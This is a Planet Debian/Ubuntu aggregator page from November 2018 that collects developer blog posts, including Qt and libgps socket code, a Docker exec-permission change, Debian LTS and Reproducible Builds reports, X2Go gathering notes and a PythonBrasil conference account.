
Using libgps instead of libQgpsmm within a Qt application

Planet Debian - Sat, 17/11/2018 - 8:12pm
I needed to create a Qt application using current Debian stable (Stretch) and gpsd. I could have used libQgpsmm, which creates a QTcpSocket for establishing the connection to the gpsd daemon. But then I hit an issue: libQgpsmm was only switched to Qt 5 after the Stretch release, namely in gpsd 3.17-4, so the version in Stretch is built against Qt 4, while my application uses Qt 5.

So the next thing to do is to use libgps itself, which is written in C. In this case one needs to call gps_open() to open a connection, gps_stream() to ask for the needed stream... and use gps_waiting() to poll the socket for data.

gps_waiting() checks for data for at most the time specified in its parameters. That means I would need to create a QTimer and poll from it to get the data: fast enough for the application to stay responsive, but not so often as to waste CPU cycles.

I did not like this idea, so I started digging through gpsd's code until I found that it exposes the socket it uses in its base struct: struct gps_data_t's gps_fd member. So the next step was to set up a QSocketNotifier around it and use its activated() signal.

So (very) basically:

// Class private:
struct gps_data_t mGpsData;
QSocketNotifier *mNotifier;

// In the implementation:
result = gps_open("localhost", DEFAULT_GPSD_PORT, &mGpsData);
// [...check result status...]

result = gps_stream(&mGpsData, WATCH_ENABLE | WATCH_JSON, NULL);
// [...check result status...]

// Set up the QSocketNotifier instance.
mNotifier = new QSocketNotifier(mGpsData.gps_fd, QSocketNotifier::Read, this);

connect(mNotifier, &QSocketNotifier::activated, this, &MyGps::readData);

And of course, MyGps::readData() calls gps_read(&mGpsData). With this, readData() is called every time there is activity on the socket, and there is no need to set up a timer anymore.

Lisandro Damián Nicanor Pérez Meyer Solo sé que sé querer, que tengo Dios y tengo fe.

RcppGetconf 0.0.3

Planet Debian - Sat, 17/11/2018 - 1:23am

A second and minor update for the RcppGetconf package for reading system configuration — not unlike getconf from the libc library — is now on CRAN.

Changes are minor. We avoid an error on a long-dead operating system cherished in one particular corner of the CRAN world. In doing so some files were updated so that dynamically loaded routines are now registered too.

The short list of changes in this release follows:

Changes in RcppGetconf version 0.0.3 (2018-11-16)
  • Examples no longer run on Solaris where they appear to fail.

Courtesy of CRANberries, there is a diffstat report. More about the package is at the local RcppGetconf page and the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Dirk Eddelbuettel Thinking inside the box

How to measure learning outcomes? The learner and the Cynic

Planet Debian - Fri, 16/11/2018 - 4:38pm

I have been having a series of strange dreams for a few days now, ever since I saw a Bollywood movie called Sui-Dhaaga a few days back.

The story is an improbable, semi-plausible tale of a person's, a couple's, no, a whole community's search for self-respect and dignity in labor. While the clothes shown at the movie's fashion show were supposedly made by them, the styles seemed pretty much reminiscent of the materials and styles used by the National Institute of Design.

One of the first dreams I had was of being in some sort of barefoot design school, interdisciplinary in nature. I am the bored guy who is there because he has no other skills, has been pressured by parents and well-wishers to do the course, and has even failed at that. I have been observing a guy who is always cleaner than the rest of us, always has a smile on his face, is content, and enjoys working with cloth, whether it is tailoring or anything and everything else to do with cloth. The material used is organic handspun Khadi, mixed with silk to lose the coarseness and harshness that handspun Khadi has, made with the fewest possible chemicals and additives, and sold at very low prices so that even a poor person can afford it.

This in reality is still a distant dream.

Anyway, with that as a backgrounder to the story: one day there is a class picnic/short trip. Because the picnic is 'free', i.e. paid for by the Institute, almost everybody except the gentleman who is always smiling and content agrees and wants to go. The gentleman says he would prefer to stay in the classroom, studying and working with the cloth.

The lone teacher/management is in a fix. While he knows the student and doesn't question his sincerity, the whole class/school is going on the picnic and there are expensive machines and materials lying around. Even the watchmen want to go on the picnic, and the teacher/management doesn't have the heart to say no to them.

He asks, in a somewhat dejected voice, if somebody wants to stay behind with him. A part of me wants to go on the picnic; a part of me wants to stay behind and, if possible, learn the mystery of the person's smile and contentedness.

After waiting an appropriate time, and after the teacher has asked a couple of times, I take on a bored, resigned tone and volunteer to stay behind, provided I get some of the sweets and any clothes or whatever else is distributed.

The next day, I wear one of my less shabby clothes and go to school, and find him near the school gates, at a nearby chai shop/tapri. He asks how I am and whether I would like to eat and drink something. I quickly order 3-4 items, and after a fullish breakfast ended by a sweet masala chai we go to the school.

The 'school' is nothing but two rooms with two adjacent toilets, one for men, one for women. The school occupies perhaps 500 square meters, with one corner for embroidery work, one corner for dyeing work, one corner for handspinning khadi and one corner with tailoring machines. Just last year we had painted the walls of the school using organic colors, and the year before some students came in who helped us bring more natural light and air into the school.

We also had a new/old water pump which, after a long fight with the local councillor, we had been able to get, giving us running water of sorts. We went to the loo, washed our hands and faces, cracked a few jokes and then, using the heavy iron key chain with its multiple keys, opened the front door and went in, he to his seat and I to mine. As always, he was fully absorbed, immersed in his work.

After waiting for half an hour to an hour, I announced that I was going to take a leak and have some water. He agreed to join me and we had a short break. After coming back, I sat a little across from him and asked if I could ask him a few questions. Without missing a beat, he said sure. I asked him a few probing questions as to who he was, who else was in his family, and what he used to do before enrolling here.

Slowly but surely, he teased out the answers, sharing that he had been a successful person with money (he actually said 'entrepreneur', but my dream self couldn't make out what that was), and that, with his savings, his wife was supporting him in this venture, as she was good at maths (a 'statistician', again something my dream self was oblivious to). Apart from that, he was learning about clothes, how they are made and so on, something he had always enjoyed but which was discouraged in his house. They were working on a book about 'learning outcomes' (which, again, my dream self knew nothing about, but when he said he would be sharing stories about me and my classmates I was excited and apprehensive at the same time). He assured me it would be nothing bad.

I asked him, in my innocence, why such a book was necessary, because in my world-view there was nothing exciting about a school where most of us were learning in the hope that the skills would somehow let us eke out a living. Looking at the bleakness of the backgrounds of the people around me, I didn't think there was anything worth writing about. I had learnt of writers who were given money to write fairy tales, and had even got a comic book or two with bright colors and pictures. When I asked him if it was going to be something similar to that, he replied in the negative. He shared that they were in fact going to self-publish the book, as it was going to be 'controversial' in nature. My dream self didn't understand what 'controversial' was all about, but was concerned when he explained that they would be putting up their own money to bring out the book. I felt this was foolishness, as nobody I knew would spend money to print a book which had no pictures and was not even a fantasy about a hero battling dragons and such.

At this moment, my dream ended. Those who have been working in the education sector would, I'm sure, be having a laugh at almost every aspect of the dream/story. 'Learning outcomes' have never been a serious consideration for either the Government of the day or previous Governments. Teachers are among the most lowly paid staff in the Government machinery. Most of those who enter the profession do it because they could not get a job any other way, and are not obsessed by the subjects they teach; they somehow want to make ends meet. The less said of the Government's 'no detention' policy, the better. Even the Government doesn't believe the stats touted by its own people, relying instead on the ASER report made by Pratham, although the present Government has reversed even that, as it wants to show it has been doing the best job in the field of education.

shirishag75 #planet-debian – Experiences in the community

Frustrating spammers

Planet Debian - Fri, 16/11/2018 - 10:31am

Sometimes tiny things make my day at 9am already.

That spammer got frustrated because none of his bots could get comments posted to my blog:

Greetings to Cambodia.

BTW: Mikrotik RouterOS 6.41, CVE-2018-7445. RCE unpatched for 9+ months.

Daniel Lange Daniel Lange's blog

Robert Ancell: Counting Code in GNOME Settings

Planet Ubuntu - Thu, 15/11/2018 - 9:05pm
I've been spending a bit of time recently working on GNOME Settings. Part of this has been bringing some of the older panel code up to modern standards, one aspect of which is making use of GtkBuilder templates.
I wondered if any of these changes would show in the stats, so I wrote a program to analyse each branch in the git repository and break down the code between C and GtkBuilder. The results were graphed in Google Sheets:

This is just the user accounts panel, which shows some of the reduction in C code and increase in GtkBuilder data:

Here's the breakdown of which panels make up the codebase:

I don't think this draws any major conclusions, but is still interesting to see. Of note:
  • Some of the changes made in 3.28 did reduce the total amount of code! But the saving was quickly gobbled up by the new Thunderbolt panel.
  • Network and Printers are the dominant panels - look at all that code!
  • I ignored empty lines in the files in case differing coding styles would make some panels look bigger or smaller. It didn't seem to make a significant difference.
  • You can see a reduction in C code looking at individual panels that have been updated, but overall it gets lost in the total amount of code.
I'll have another look in a few cycles when more changes have landed (I'm working on a new sound panel at the moment).

Ubuntu Podcast from the UK LoCo: S11E36 – Thirty-Six Hours

Planet Ubuntu - Thu, 15/11/2018 - 4:00pm

This week we’ve been resizing partitions. We interview Andrew Katz and discuss open source and the law, bring you a command line love and go over all your feedback.

It’s Season 11 Episode 36 of the Ubuntu Podcast! Alan Pope, Mark Johnson and Martin Wimpress are connected and speaking to your brain.

In this week’s show:

snap install hub
hub ci-status
hub issue
hub pr
hub sync
hub pull-request
  • And we go over all your amazing feedback – thanks for sending it – please keep sending it!

  • Image credit: Greyson Joralemon

That’s all for this week! You can listen to the Ubuntu Podcast back catalogue on YouTube. If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

Freexian’s report about Debian Long Term Support, October 2018

Planet Debian - Thu, 15/11/2018 - 3:36pm

Like each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In October, about 209 work hours have been dispatched among 13 paid contributors. Their reports are available:

  • Abhijith PA did 1 hour (out of 10 hours allocated + 4 extra hours, thus keeping 13 extra hours for November).
  • Antoine Beaupré did 24 hours (out of 24 hours allocated).
  • Ben Hutchings did 19 hours (out of 15 hours allocated + 4 extra hours).
  • Chris Lamb did 18 hours (out of 18 hours allocated).
  • Emilio Pozuelo Monfort did 12 hours (out of 30 hours allocated + 29.25 extra hours, thus keeping 47.25 extra hours for November).
  • Holger Levsen did 1 hour (out of 8 hours allocated + 19.5 extra hours, but he gave back the remaining hours due to his new role, see below).
  • Hugo Lefeuvre did 10 hours (out of 10 hours allocated).
  • Markus Koschany did 30 hours (out of 30 hours allocated).
  • Mike Gabriel did 4 hours (out of 8 hours allocated, thus keeping 4 extra hours for November).
  • Ola Lundqvist did 4 hours (out of 8 hours allocated + 8 extra hours, but gave back 4 hours, thus keeping 8 extra hours for November).
  • Roberto C. Sanchez did 15.5 hours (out of 18 hours allocated, thus keeping 2.5 extra hours for November).
  • Santiago Ruano Rincón did 10 hours (out of 28 extra hours, thus keeping 18 extra hours for November).
  • Thorsten Alteholz did 30 hours (out of 30 hours allocated).
Evolution of the situation

In November we are welcoming Brian May and Lucas Kanashiro back as contributors after they took a break from this work.

Holger Levsen is stepping down as LTS contributor but is taking over the role of LTS coordinator that was solely under the responsibility of Raphaël Hertzog up to now. Raphaël continues to handle the administrative side, but Holger will coordinate the LTS contributors ensuring that the work is done and that it is well done.

The number of sponsored hours increased to 212 hours per month, and we gained a new sponsor (who shall not be named, since they don’t want to be publicly listed).

The security tracker currently lists 27 packages with a known CVE and the dla-needed.txt file has 27 packages needing an update.

Thanks to our sponsors

New sponsors are in bold.


Raphaël Hertzog apt-get install debian-wizard

docker and exec permissions

Planet Debian - Wed, 14/11/2018 - 11:53pm
# docker version|grep Version
Version:           18.03.1-ce
Version:           18.03.1-ce
# cat Dockerfile
FROM alpine
RUN addgroup service && adduser -S service -G service
COPY --chown=root:root /opt/
RUN chmod 544 /opt/
USER service
ENTRYPOINT ["/opt/"]
# cat
#!/bin/sh
ls -l /opt/
whoami
# docker build -t foobar:latest .; docker run foobar
Sending build context to Docker daemon  5.12kB
[...]
Successfully built 41c8b99a6371
Successfully tagged foobar:latest
-r-xr--r-- 1 root root 37 Nov 14 22:42 /opt/
service
# docker version|grep Version
Version:           18.09.0
Version:           18.09.0
# docker run foobar
standard_init_linux.go:190: exec user process caused "permission denied"

That changed with 18.06 and has just uncovered some issues. I was, well, let's say "surprised" that this ever worked at all. Other sets of permissions like 0700 or 644 already failed, with a different error message, on docker 18.03.1.

Sven Hoexter a blog

Visiting London

Planet Debian - Wed, 14/11/2018 - 2:42pm

I'm visiting London the rest of the week (November 14th–18th) to watch games 5 and 6 of the Chess World Championship. If you're in the vicinity and want to say hi, drop me a note. :-)

Steinar H. Gunderson Steinar H. Gunderson

Alerts in Weblate to indicate problems with translations

Planet Debian - Wed, 14/11/2018 - 2:15pm

The upcoming Weblate 3.3 will bring a new feature called alerts. This is a single location where you will see problems in your translations. Right now it mostly covers Weblate integration issues, but it will be extended in the future with deeper translation-wide diagnostics.

This will help users better integrate Weblate into their development process, by giving integration hints and highlighting problems Weblate has found in the translation. It will identify typical problems like unmerged git repositories, parse errors in files, or duplicate translation files. You can read more about this feature in the Weblate documentation.

You can enjoy this feature on Hosted Weblate right now; it will be part of the upcoming 3.3 release.

Filed under: Debian English SUSE Weblate

Michal Čihař Michal Čihař's Weblog, posts tagged by Debian

Tiago Carrondo: S01E10 – Tendência livre

Planet Ubuntu - Wed, 14/11/2018 - 3:02am

This time with a guest, Luís Costa, we talked a lot about hardware, free hardware and, as could not be otherwise, about Libretrend's new products, the brand-new Librebox. In a month full of events, the calendar got special attention, with updates on all the announced meetups and events! You know the drill: listen, subscribe and share!


This episode was produced and edited by Alexandre Carrapiço (Thunderclaws Studios – recording, production, editing, mixing and mastering). Contact: thunderclawsPT–arroba–

Attribution and licenses

Cover image: richard ling at Visualhunt, licensed CC BY-NC-ND.

The theme music is “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)” by Alpha Hydrae, licensed under the CC0 1.0 Universal License.

This episode is licensed under Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0), whose full text can be read here. We are open to licensing for other kinds of use; contact us for validation and authorization.

Reproducible Builds: Weekly report #185

Planet Debian - Tue, 13/11/2018 - 2:56pm

Here’s what happened in the Reproducible Builds effort between Sunday November 4 and Saturday November 10 2018:

Packages reviewed and fixed, and bugs filed

diffoscope development

diffoscope is our in-depth “diff-on-steroids” utility which helps us diagnose reproducibility issues in packages. This week, version 105 was uploaded to Debian unstable by Mattia Rizzolo. It included contributions already covered in previous weeks as well as new ones from:

Website updates

There were a large number of changes to our website this week:

In addition to that we had contributions from Deb Nicholson, Chris Lamb, Georg Faerber, Holger Levsen and Mattia Rizzolo et al. on the press release regarding joining the Software Freedom Conservancy:

Test framework development

There were a large number of updates this week by Holger Levsen to our Jenkins-based testing framework (see below). The most important work was done behind the scenes, outside of Git: a long debugging session to find out why the Jenkins Java processes were suddenly consuming all of the system resources while the machine had a load of 60-200. This involved temporarily removing all 1,300 jobs, disabling plugins and making other changes. In the end, it turned out that the underlying SSH/HDD performance was configured poorly and, after this was fixed, Jenkins returned to normal.

In addition, Mattia Rizzolo fixed an issue in the web-based package rescheduling tool by encoding a string before passing it on, and fixed the parsing of the “issue” selector option.

This week’s edition was written by Arnout Engelen, Bernhard M. Wiedemann, Chris Lamb, Holger Levsen, Oskar Wirga, Santiago Torres, Snahil Singh & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

Reproducible builds folks

Results produced while at "X2Go - The Gathering 2018" in Stuttgart

Planet Debian - Mon, 12/11/2018 - 3:25pm

Over the last weekend, I attended the FLOSS meeting "X2Go - The Gathering 2018" [1]. The event took place at the shackspace maker space in Ulmerstraße in Stuttgart-Wangen (near S-Bahn station S-Untertürkheim). Thanks to the people from shackspace for hosting us there, I highly enjoyed your location's environment. Thanks to everyone who joined us at the meeting. Thanks to all event sponsors (food + accommodation for me). Thanks to Stefan Baur for being our glorious and meticulous organizer!!!

Thanks to my family for letting me go for that weekend.

Especially, a big thanks to everyone that I was allowed to bring our family dog "Capichera" with me to the event. While Capichera adapted quite well to this special environment on sunny Friday and sunny Saturday, he was not really feeling well on rainy Sunday (aching joints, unwilling to move, walk or interact).

For those interested and especially for our event sponsors, below you can find a list of produced results related to the gathering.


2018-11-09 Mike Gabriel (train ride + @ X2Go Gathering 2018)
  • X2Go: Port x2godesktopsharing to Qt5.
  • Arctica: Release librda 0.0.2 (upstream) and upload librda 0.0.2-1 to Debian unstable (as NEW).
  • Arctica: PR reviews and merges:
  • Arctica: Fix autobuilders (add libxkbfile-dev locally to the build systems' list of packages, required for latest nx-libs with xkb- branch merged).
  • Arctica: Fix (IMAKE_)FONT_DEFINES build logic in nx-libs (together with Ulrich Sibiller)
  • X2Go: Explain X2Go Desktop Sharing to one of the event sponsors.
  • Discuss various W-I-P branches in nx-libs and check their development status with the co-maintainers.
  • Debian: Upload to stretch-backports: mate-tweak 18.10.2-1~bpo9+1.
  • Debian: Upload to stretch-backports: mate-icon-theme 1.20.2-1~bpo9+1.
2018-11-10 - Mike Gabriel (@ X2Go Gathering 2018)
  • my tool chain: make my smtp_tunnel script more robust and specific about which autossh tunnel to take down. Add "up" and "down" as the first argument, so now I can also take down the autossh tunnel for SMTP (as opposed to unspecifically doing killall autossh).
  • Talks:
    • Discussion Slot - more general NX-Libs discussion (BIG-REQUESTS, Xinerama, Telekinesis)
    • Demo: Arctica Greeter with X2Go Logon
    • Demo/Discussion: Current state of the Python Broker, Feature Requests
    • Discussion Slot - more general NX-Libs discussion (Software rendering, OpenGL, GLX, … how is that all related? And would we be able to speed things up in a Telekinesis-like approach somehow?)
  • Cooking: Prepare a nearly vegan (the carrots had butter), organic Italian pasta dinner (with salad and ciabatta bread) for the group, together with Ritchi and Thomas. Much appreciation to plattsalat e.V. [2] for sponsoring the food.
  • PyHoca-CLI: Fix normal password authentication (i.e. for users that don't use SSH priv/pub keys).
  • Python X2Go / PyHoca-CLI: Add a check directly after authentication that the remote server has the X2Go Server software installed; exit with an error and bail out if not.
  • X2Go Consulting: Demo possible approach for having X2Go in the webbrowser again to Martti Pikanen.
2018-11-11 - Mike Gabriel (@ X2Go Gathering 2018 + train ride)
  • Debian: Port pinentry-x2go to Qt5, upload pinentry-x2go to unstable.
  • X2Go: Apply changes on top of pinentry-x2go upstream.
  • Talks:
    • Quick introduction to librda.
  • Debian: Upload to unstable: mate-polkit 1.20.1-2.
  • X2Go: Work on x2godesktopsharing upstream:
    • allow system-wide default settings
    • store sharing group in settings (instead of hard-coding a POSIX group name)
    • rewrite the access grant/deny dialog
  • Debian: Prepare Debian package for x2godesktopsharing.
    • debconf: make the sharing group name selectable
    • debconf: auto-start desktop sharing
    • debconf: auto-activate desktop sharing when started
References

sunweaver sunweaver's blog

Review: The "Trojan Room" coffee

Planet Debian - Mon, 12/11/2018 - 1:20pm

I was recently invited to give a seminar at the University of Cambridge's Department of Computer Science and Technology on the topic of Reproducible Builds.

Whilst it was an honour to have been asked, it also afforded an opportunity to drink coffee from the so-called "Trojan Room" which previously housed the fabled Computer Laboratory coffee pot:

For those unaware of the background: to save hackers in the building from finding the coffee machine empty, a camera was set up on the local network in 1991, using an Acorn Archimedes to capture a live 128×128 image of the pot, thus becoming the world's first webcam.

According to Quentin Stafford-Fraser, the technical limitations at the time did not matter:

The image was only updated about three times a minute, but that was fine because the pot filled rather slowly, and it was only greyscale, which was also fine, because so was the coffee.

Whilst the original pot was sold for £3,350 in 2001, what, you may ask, did I think of the coffee I sampled? Did the historical weight of the room imbue a certain impalpable quality into the beverage itself? Perhaps this modern hacker lore inspired deep intellectual thoughts in me? Did it infuse a superlative and indefinable depth of flavour that belied the coffee's quotidian origins…?

No, it did not.

(Thanks to Allison Randal for arranging this opportunity.)

Chris Lamb lamby: Items or syndication on Planet Debian.

Achievement unlocked! I spoke at PythonBrasil[14]

Planet Debian - Mon, 12/11/2018 - 3:49am
PyLadies (and going to PythonBrasil)

PythonBrasil is the national Python community conference that happens every year, usually in October, in Brazil.

I attended PythonBrasil for the first time in 2016, the year we had started PyLadies Porto Alegre. Back then, we were a very small group and I was the only one to go. It was definitely one of the best experiences I ever had, which, of course, set a very high standard for every single tech event I attended afterwards.

Because of the great time I had there, I wanted to bring more and more women from PyLadies Porto Alegre to experience PythonBrasil in the following editions. So, during the PyLadies Porto Alegre 1st birthday party, I encouraged the other women to submit activities and to try to go to the conference, which would happen in Belo Horizonte.

When attending it for the second time, I didn't go alone. Daniela Petruzalek had her talk accepted. Claudia, also from PyLadies Porto Alegre, was able to go for the first time, thanks to the support of the PyLadies Brazil crowdfunding campaign. To me, one of the most memorable things about this PythonBrasil was "The (unofficial) PyLadies House", where I stayed. It was a huge house that we rented and shared between about 18 people to help with the accommodation costs for all of us. We shared breakfasts and rides and stories. We watched other PyLadies rehearse their talks, gave lightning tech talks late at night and we even had a birthday party!

So, this year? The idea of encouraging PyLadies POA submissions, something that had come up almost spontaneously last year, matured, and we worked to make the PyLadies Porto Alegre 2nd Birthday Party an all-day event with that purpose. The schedule? Lightning talks about Python projects from its members, talks about experiences as participants and as speakers at Python Brasil and... we also had help from Vinta Software's Flavio Juvenal, who acted as a mentor to the women who were considering submitting an activity to PythonBrasil. He even made a great GitHub repo with a proposal checklist to assist us, and he made himself available to review the proposals we wrote.

The result? We had more than 6 women from PyLadies Porto Alegre with activities accepted to PythonBrasil[14]. Some of them even had more than one activity (tutorial and talk) accepted.

I was among the ones who had been accepted. Ever since attending the conference for the first time, it had been a goal of mine to give a talk at PythonBrasil. But not just any talk: I wanted it to be a technical talk. What I learned during Outreachy, and how I had used it for a real task in a job, finally gave me the confidence to do so. I felt ready, so I submitted and I was accepted.

I made my way to Natal, the capital of the Rio Grande do Norte (RN) state (in the Northeast of Brazil), two days before the conference was to start, since it was the cheapest ticket I could find. Besides, the PyLadiesBRConf was scheduled to happen on the day before and I was hoping I would be able to attend. PyLadiesBRConf was a full day of talks organized by what one could call "the original PyLadies Brazil", since the PyLadies community in Brazil actually started in Natal and was named so (afterwards, groups started naming themselves after their cities).

The PythonBrasil[14] conference

On the next day, PythonBrasil[14] started. It was the biggest PythonBrasil to happen yet, with over 700 attendees (plus staff). Like many PyCons, the conference days are usually split between tutorials, talks and sprints.

Day 1 - tutorials

The tutorials have free admission and are open for anyone to attend (whether or not they have bought a ticket to the conference). Unfortunately, due to the capacity of the rooms where they were held, there was a limit of 100 registrations per tutorial. By the time I went to register for the first day's tutorials, they were all fully booked. Even so, the tutorial I was most interested in, "Building REST APIs with Django REST Framework", had to be cancelled anyway because the presenter missed his flight. :( On this first day, I met with a few PyLadies and people from the Python community who were in Natal, walked on the beach and focused on preparing my talk.

Day 2 - tutorials

I must confess that I had registered for the tutorial on Pandas ("It's not witchcraft, it's Pandas", by Fernando Masanori) merely because Flavio Juvenal had mentioned Pandas in the feedback on my proposal. I had no idea what it was actually about or why one would even use Pandas. By noon on that second day, though, I was very glad that I did (and that I got a spot in it!). I learned a bit about Pandas and I also learned how to use Jupyter Notebooks, something I had never tried before either. I found both Pandas and Jupyter easy and interesting and I look forward to doing some projects using them.

Back when we (PyLadies) were discussing submissions to PythonBrasil with Professor Masanori, Data Structures was something that both I and another PyLady (Debora) had mentioned we had been meaning to focus on and study more. So, he came up with the idea for a tutorial about it, called: "Data Structures are <3".

In this tutorial, I found it quite interesting to learn and play with recursive functions and with searching algorithms. I was quite impressed by heapsort (who knew doing such a thing could be so cool?).
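Heapsort is easy to sketch with Python's standard heapq module (this is just an illustration, not the tutorial's actual material):

```python
import heapq

def heapsort(items):
    """Sort by heapifying a copy, then repeatedly popping the minimum."""
    heap = list(items)
    heapq.heapify(heap)  # O(n) bottom-up heap construction
    # each heappop is O(log n), so the whole sort is O(n log n)
    return [heapq.heappop(heap) for _ in range(len(heap))]

print(heapsort([5, 1, 4, 2, 3]))
```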

Image Licensed CC BY-SA 3.0 Attribution: RolandH

Everything at PythonBrasil (tutorials, talks and sprints) happened in the same hotel. So, after the tutorials were over, I hung around with some of the people of the community who were staying at the same hostel. The organizing team asked for help in putting together the conference kit (bag, t-shirt, IDs and flyers). We set up a sort of production line and considerably cut down the time needed by the volunteer team.

Afterwards, I was still processing everything that I had learned and I wanted to try the new things, so I went back to the hostel to code some more. I confess that I was so hooked that I stayed up until 2 am to create the code with Pandas that I would incorporate in my talk as a bonus content.

Day 3 - talks

On this day, I had the opportunity to meet and socialize with a lot of people who were coming to Python Brasil for the first time. It was particularly delightful to see a lot of students from a public technical school (Instituto Federal) attending the conference with their teachers. They had been given tickets, which allowed them to attend the (otherwise very expensive) conference and I must say that this is the kind of inclusion that I always want to see in tech events.

From the talks, I want to highlight these moments: I learned about Scrapy (which I have been playing around with a bit since then), I watched an awesome talk about using Python with Physics (although I don't have in-depth knowledge of Physics, I count it as a success that I could follow the talk in its entirety, so cheers to the presenter, Ana Maria, from PyLadies Teresina) and I must mention that I was quite impressed by Elias Dorneles' talk about developing software for the command line. Even his "slides" were made there - and there were drawings and music too, all made with Python on the command line!

Day 4 - talks

The second day of talks brought us the much needed talk about AfroPython, an initiative that was created to increase representation of Black and native Brazilian people in our community.

A talk that gathered a lot of attention (and overcrowded the room it was given in!) was the one about using Python to understand data about suicides to help prevent them. It's a hard subject for many people, but it is one that we definitely need to talk about.

Andreza Rocha's talk "Dear White People (from HR)" also touched a lot of people. She drew from her own experiences as a tech recruiter to question the homogeneity that we (still) have in tech. "Who are the ones who recruit the people?" she asked. "For us to be recruited, we (black people) have to be alive."

It was on this day that a violation of Python Brasil's Code of Conduct happened. After a PyLady gave her talk, a male participant used the time for questions not to ask a question, but to, let's say... eulogize the woman who had given the talk... by demeaning all the other women who had presented before her and weren't "technical enough" or something like that. Oh, how thick we must make our skin to be able to come up on a stage knowing we might be subjected to a moment like that... I am glad the PyLady was experienced and level-headed enough to own the moment and give him the comeback he deserved. *sigh* (After the conference, the organization published a note about the CoC violation.)

Contrary to popular belief, yes, I did watch the last keynote of the day, even though it was Facebook's. And it did surprise me. Rainer Alves spoke about the shifts in corporate culture that happened when they merged infrastructure and development people into a "Production Engineering" department. What I found most relevant, though, was the slide below, about "blameless postmortems". After all, how can one actually correct a malpractice or an error other than by working collectively to figure out the way? "It's not about what you did, it's about what went wrong."

This was the day we took the official photo of Python Brazil:

It was also the day we took a picture with the women who were at the conference:

Day 5 - talks

Sunday arrived and it was time for: 'But can you open it on Excel?' Exporting to TXT, CSV and JSON with Python ("'Mas dá pra abrir no Excel?'' Exportando para TXT, CSV e JSON com Python"). The focus of my talk was how to export data to those formats using mainly the tools offered by the Python Standard Library. But, as I mentioned before, thanks to what I learned during the PythonBrasil tutorials, I was able to add some extra content and show how the export to CSV could be done with Pandas as well. I was very glad about this, even though I felt like there was so little time to go over all the content I wanted to present (I had time to go through all my slides and for a very brief demonstration, but that was it). I think it went well. I even managed to speak briefly about Free Software (since I don't use Excel, and I made my demonstration with LibreOffice).
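To give a flavour of the subject (a sketch with made-up records, not the actual code from my slides), exporting the same data to CSV and JSON with only the standard library looks roughly like this:

```python
import csv
import io
import json

records = [
    {"name": "Ada", "language": "Python"},
    {"name": "Grace", "language": "Python"},
]

# CSV with the stdlib: DictWriter maps dict keys to columns
csv_buf = io.StringIO()
writer = csv.DictWriter(csv_buf, fieldnames=["name", "language"])
writer.writeheader()
writer.writerows(records)

# JSON with the stdlib: a single call gives a readable dump
json_text = json.dumps(records, indent=2, ensure_ascii=False)

print(csv_buf.getvalue())
print(json_text)
```

With Pandas, the CSV part collapses to a one-liner along the lines of pd.DataFrame(records).to_csv(path, index=False), which is what made the bonus content so appealing.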

When they opened time for questions, I explicitly said "Questions, not comments, please", hoping to avoid mansplaining or another incident like the one that had happened the day before. And I know people judged me for that, but... I am also aware they judged me more harshly because I am a woman. After all, in previous editions we have had male keynote speakers making the very same comment without people being offended by it.

This did not stop people from coming to talk to me afterwards with comments about their experiences anyway - and that was definitely better, because I felt like I could talk to them more properly and personally about it, having more time than the 5 minutes allotted to questions and not having to answer under a full audience's scrutiny.

Other than my own talk, I would like to mention some other talks I attended. There was a talk about advanced functional programming ("Going further than map, filter and reduce"), which is something I find interesting to have some idea about, even though I don't quite fully grasp it yet. There was also the PyLadies' talk, where a group representing each region of Brazil with a PyLadies group talked about the work we have been doing. Andressa went on for PyLadies Porto Alegre and talked about all the work we have been doing, in particular regarding all the Django Girls workshops we have helped at in Rio Grande do Sul since the last PythonBrasil.

Ana Paula gave a fun talk about Genetic Algorithms with Python, using the language to work with Biology data. Another subject that I am not very familiar with, but that I found quite interesting. And I also saw Camilla Martins live coding to run Python with Node.js on the big stage.

During the lightning talks, something amazing happened: the Instituto Federal students went up on the stage and talked about their experience at PythonBrasil using a regional sung-poetry called Cordel. It was really remarkable.

Also during the lightning talks, we had Thrycia Oliveira, a former participant of Django Girls, calling attention to the fact that we need to have spaces in the community that are inclusive to parents, in particular to moms. She said that the PythonBrasil organization tried to arrange that, and she thanked them for it, but it had not been possible. I also remember when she told me about her participation in Python Nordeste (a regional conference that preceded PythonBrasil) and how she and her husband had to alternate the days they attended, because one of them had to stay at home to watch over their kids (it wasn't really a kids-inclusive event).

This day ended with Betina's keynote "Does this algorithm have a soul?", a very relevant question for the state of software development today. Her talk spoke to me and to a lot of people in the audience, and I can't picture a more welcoming community for it to have been given to.

Day 6 - sprints

Sadly, Python Brazil had to come to an end. Day 6 happened on a Monday, and that meant that the majority of the people, including almost all the PyLadies, had already returned home. :( For personal reasons that I would rather not talk about publicly, I chose not to take part in the coding sprint to help with APyB's site. Instead, because I am looking for work, I used this day mostly for networking and applying to jobs I had heard about during PythonBrasil. I don't have wifi at home and I need to take any opportunity I can get to use the internet to send CVs and take technical tests, so that is what I did.

Wrapping things up...

And, of course, to finish this post I ought to mention the beach... On my last two days in Natal, I was gifted with the awesomeness that it is the ocean at Ponta Negra during the full moon. There are no words to describe the beauty of it (I am sorry I couldn't take a good picture of it).

Thank you notes

I know this post ended up being extensive, but how can one summarize an experience with an event as huge as PythonBrasil? It's hard. I think it's safe to say that being part of something like that has a lasting impact on my life. All the technical content I have heard about gives me motivation to keep studying and learning new things. All the people I have met, friends old and new, give meaning to the work of making the Python community more open and inclusive.

So, I cannot thank Outreachy enough for making my participation in Python Brasil possible!

This whole journey would not be possible without the awesome people below, so I would like to also thank:

  • My Outreachy mentors Daniel Pocock and Bruno for the support during the internship and beyond
  • Flavio Juvenal for the feedback on my proposal and giving the golden tip about Pandas
  • Andreza Rocha for not letting me give up on my dream to go to this PythonBrasil
  • Felipe de Morais and Betina Costa for sitting in the very front row and nodding when I was unsure during my talk
  • Elias Dorneles for the support when applying to Outreachy and for reviewing my slides
  • PyLadies Brazil for being the safety net so many women can rely on
Renata Renata's blog

Stephen Kelly: Future Developments in clang-query

Planet Ubuntu - Dje, 11/11/2018 - 11:46md
Getting started – clang-tidy AST Matchers

